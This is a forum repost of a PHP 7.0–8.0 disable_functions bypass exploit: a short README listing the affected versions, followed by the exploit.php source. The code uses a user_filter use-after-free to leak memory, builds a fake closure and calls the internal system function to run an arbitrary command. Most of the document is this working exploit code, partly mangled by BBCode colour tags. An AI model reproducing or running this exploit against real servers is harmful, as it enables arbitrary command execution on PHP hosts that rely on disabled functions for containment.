PHP 7.0-8.0 disable_functions bypass [user_filter]
https://github.com/mm0r1/exploits/tr...-filter-bypass
Spoiler: README.md
PHP 7.0-8.0 disable_functions bypass [user_filter]
This exploit uses a bug reported over 10 years ago. As usual, the PoC was tested on various php builds for Debian/Ubuntu/CentOS/FreeBSD with cli/fpm/apache2 server APIs and found to work reliably.
Targets
- 5.* - exploitable with minor changes to the PoC
- 7.0 - all versions to date
- 7.1 - all versions to date
- 7.2 - all versions to date
- 7.3 - all versions to date
- 7.4 - all versions to date
- 8.0 - all versions to date
Fix
Stop relying on disable_functions (or any other php.ini settings) for security: they are enforced inside the same process as the interpreter, so any memory-corruption bug in the interpreter lets a script bypass them.
Post scriptum
There are many memory corruption vulnerabilities in PHP - some of them are publicly known, others are not. Regardless, PHP devs don't care much about these, as you can see in the bug reports.
This PoC is for demonstration purposes only. The exploits that could have been developed and used during the past decade might not be.
Spoiler: exploit.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]filtername[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]Pwn[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]alloc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]STRING_SIZE[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]stream[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]go[/COLOR][COLOR="#007700"](); return[/COLOR][COLOR="#0000BB"]PSFS_PASS_ON[/COLOR][COLOR="#007700"]; }
private function[/COLOR][COLOR="#0000BB"]go[/COLOR][COLOR="#007700"]() { [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]abc[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]filtername[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]make_uaf_obj[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Helper[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]= function([/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]) {};
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_addr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]str2ptr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]CHUNK_SIZE[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]0x18[/COLOR][COLOR="#007700"]) -[/COLOR][COLOR="#0000BB"]CHUNK_SIZE[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"helper @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_addr[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]abc_addr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_addr[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]CHUNK_SIZE[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"abc @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]abc_addr[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_off[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_addr[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]abc_addr[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]0x18[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$helper_handlers[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]str2ptr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]CHUNK_SIZE[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"helper handlers @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$helper_handlers[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]prepare_leaker[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$binary_leak[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$helper_handlers[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"binary leak @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$binary_leak[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]prepare_cleanup[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$binary_leak[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$closure_addr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]str2ptr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x38[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"real closure @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$closure_addr[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$closure_ce[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$closure_addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x10[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"closure class_entry @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$closure_ce[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$basic_funcs[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_basic_funcs[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$closure_ce[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"basic_functions @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$basic_funcs[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$zif_system[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$basic_funcs[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"zif_system @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$zif_system[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$fake_closure_off[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]CHUNK_SIZE[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]; for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fake_closure_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$closure_addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"])); } [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fake_closure_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x38[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$handler_offset[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]PHP_MAJOR_VERSION[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]0x70[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0x68[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fake_closure_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$handler_offset[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$zif_system[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$fake_closure_addr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$fake_closure_off[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_off[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x38[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$fake_closure_addr[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"fake closure @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$fake_closure_addr[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]cleanup[/COLOR][COLOR="#007700"](); ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"])([/COLOR][COLOR="#0000BB"]CMD[/COLOR][COLOR="#007700"]); }
private function[/COLOR][COLOR="#0000BB"]make_uaf_obj[/COLOR][COLOR="#007700"]() { [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]uafp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'php://memory'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'w'[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]uafp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]pack[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'QQQ'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0xDEADBAADC0DE[/COLOR][COLOR="#007700"])); for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]uafp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\x00"[/COLOR][COLOR="#007700"]); } }
private function[/COLOR][COLOR="#0000BB"]prepare_leaker[/COLOR][COLOR="#007700"]() { [/COLOR][COLOR="#0000BB"]$str_off[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]CHUNK_SIZE[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$str_off[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$str_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x10[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$val_off[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x48[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$val_off[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]CHUNK_SIZE[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$val_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0xA[/COLOR][COLOR="#007700"]); }
private function[/COLOR][COLOR="#0000BB"]prepare_cleanup[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$binary_leak[/COLOR][COLOR="#007700"]) { [/COLOR][COLOR="#0000BB"]$ret_gadget[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$binary_leak[/COLOR][COLOR="#007700"]; do { --[/COLOR][COLOR="#0000BB"]$ret_gadget[/COLOR][COLOR="#007700"]; } while([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ret_gadget[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) !==[/COLOR][COLOR="#0000BB"]0xC3[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"ret gadget = 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ret_gadget[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]abc_addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x20[/COLOR][COLOR="#007700"]- ([/COLOR][COLOR="#0000BB"]PHP_MAJOR_VERSION[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]0x50[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0x60[/COLOR][COLOR="#007700"])); [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ret_gadget[/COLOR][COLOR="#007700"]); }
private function[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]) { [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]CHUNK_SIZE[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]16[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]0x10[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]c[/COLOR][COLOR="#007700"]); if([/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"]!==[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]) {[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]&= ([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]abc[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]chr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$v[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]0xff[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$v[/COLOR][COLOR="#007700"]>>=[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]; } }
private function[/COLOR][COLOR="#0000BB"]get_basic_funcs[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]) { while([/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]) { [/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]-=[/COLOR][COLOR="#0000BB"]0x10[/COLOR][COLOR="#007700"]; if([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]) ===[/COLOR][COLOR="#0000BB"]0xA8[/COLOR][COLOR="#007700"]&& [/COLOR][COLOR="#0000BB"]in_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]), [[/COLOR][COLOR="#0000BB"]20151012[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]20160303[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]20170718[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]20180731[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]20190902[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]20200930[/COLOR][COLOR="#007700"]])) { [/COLOR][COLOR="#0000BB"]$module_name_addr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x20[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$module_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$module_name_addr[/COLOR][COLOR="#007700"]); if([/COLOR][COLOR="#0000BB"]$module_name[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]0x647261646e617473[/COLOR][COLOR="#007700"]) { 
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"standard module @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]); return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x28[/COLOR][COLOR="#007700"]); } } } }
private function[/COLOR][COLOR="#0000BB"]get_system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$basic_funcs[/COLOR][COLOR="#007700"]) { [/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$basic_funcs[/COLOR][COLOR="#007700"]; do { [/COLOR][COLOR="#0000BB"]$f_entry[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$f_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f_entry[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"]); if([/COLOR][COLOR="#0000BB"]$f_name[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]0x6d6574737973[/COLOR][COLOR="#007700"]) { return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]); } [/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]+=[/COLOR][COLOR="#0000BB"]0x20[/COLOR][COLOR="#007700"]; } while([/COLOR][COLOR="#0000BB"]$f_entry[/COLOR][COLOR="#007700"]!==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]); }
private function[/COLOR][COLOR="#0000BB"]cleanup[/COLOR][COLOR="#007700"]() { [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]hfp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'php://memory'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'w'[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]hfp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]pack[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'QQ'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]abc_addr[/COLOR][COLOR="#007700"])); for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]hfp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\x00"[/COLOR][COLOR="#007700"]); } }
